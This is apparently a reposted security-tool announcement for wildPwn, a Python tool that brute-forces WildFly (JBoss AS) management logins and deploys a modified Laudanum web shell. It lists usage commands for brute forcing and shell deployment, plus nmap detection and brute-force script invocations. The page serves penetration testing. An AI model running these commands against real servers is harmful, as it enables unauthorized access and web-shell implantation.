wildPwn - Brute forcer and shell deployer for WildFly (JBoss AS)


WildFly, formerly known as JBoss AS, or simply JBoss, is an application server authored by JBoss, now developed by Red Hat. WildFly is written in Java, and implements the Java Platform, Enterprise Edition (Java EE) specification. It runs on multiple platforms. WildFly is free and open-source software, subject to the requirements of the GNU Lesser General Public License (LGPL), version 2.1.

It is a tool for WildFly. Tool can be used to brute force or shell deploy. wildPwn.war contains modified Laudanum Shell. userList.txt contains common usernames and passList.txt contains common passwords.

Usage
Bruteforce
python wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST> 
Shell Deploy
python wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>

Nmap Scripts
Detection
nmap --script wildfly-detect <TARGET>
Brute Force
nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>

Video

More details: https://artofpwn.com/wildfly-exploitation.html

wildPwn - Brute forcer and shell deployer for WildFly (JBoss AS) wildPwn - Brute forcer and shell deployer for WildFly (JBoss AS) Reviewed by Zion3R on 5:19 PM Rating: 5